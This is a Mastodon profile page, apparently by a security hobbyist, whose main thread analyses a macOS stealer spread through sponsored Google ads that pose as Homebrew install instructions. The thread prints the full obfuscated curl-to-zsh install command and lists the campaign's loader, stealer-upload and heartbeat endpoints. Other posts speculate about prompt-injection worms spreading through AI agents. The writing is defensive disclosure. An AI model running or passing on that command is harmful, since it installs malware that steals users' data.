Joseph

@[email protected]
142 Followers
203 Following
196 Posts

Developer at a cybersecurity startup.

Infosec hobyist, hope that one day I'll actually be able to contribute.

Rarely complete projects (ask me about my honeypot, or pippin)

Twitterhttps://twitter.com/fauxeccles
GHhttps://github.com/faux-eccles
pronounshe/him
Show threadJoseph2h ago

Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com

Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd

Show threadJoseph3h ago

Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata&region=anywhere

I suspect it could be compromised ads account, that being said I can't actually find this ad listed in the transparency page

Show threadJoseph3h ago

A more sane and parseable list of indicators:

Landing page

httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

Loaders

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

Mocked User Agent for curls

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

APIs

httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API

api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

#osx #stealer #iocs

Joseph4h ago

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh


Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197


hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew

JosephMar 11
terms of service Jul 26, 2025
that's right! it goes in the DOWNLOADS folder
JosephMar 8
Su-SheeMar 7

this is an interesting article about LLM generated code (an sqlite rewrite in rust) and the difference between "it works" and "it's good". also interesting database stuff :)

https://blog.katanaquant.com/p/your-llm-doesnt-write-correct-code

Your LLM Doesn't Write Correct Code. It Writes Plausible Code.

One of the simplest tests you can run on a database:

Vagabond Research
JosephMar 7
Fi 🏳️‍⚧️Mar 7

RE: https://social.coop/@cwebber/116178050263113242

openclaw basically already provides the platform for this, tho the blast radius is going to be inherently limited by the way in which llm instructions get corrupted; the "game of telephone" situation will mutate the botnet into unpredictable behavior fairly quickly, I expect.

JosephMar 7

RE: https://infosec.exchange/@catsalad/116186492239907316

This has just made me have a berenstein bear moment I think.

I remember ages ago there was a novelty shirt that had functional code to break some form of copyright protection/drm, and it was labeled something like this shirt is illegal.

I was thinking it would be neat to have new shirts the same vein that directed people to *nix distributions without age verification.

But now I can't find examples of the shirt I'm thinking of, all "this shirt is illegal" results that I can find are some persecuted Christianity message.

JosephMar 7

RE: https://mastodon.social/@knoppix95/116178259499310735

How long until the first agent based prompt injection worm? This level of non deterministic self evaluating/constructing behavior would make tracking and identifying rogue agents pretty difficult I think?

I remember reading years and years ago about polymorphism in self replicating malware and this just seems ripe for abuse

JosephMar 3
SeirdyMar 3
as a civilization, we need to pool our efforts away from GenAI and into a more useful technology. Specifically, time travel that will let me make out with myself.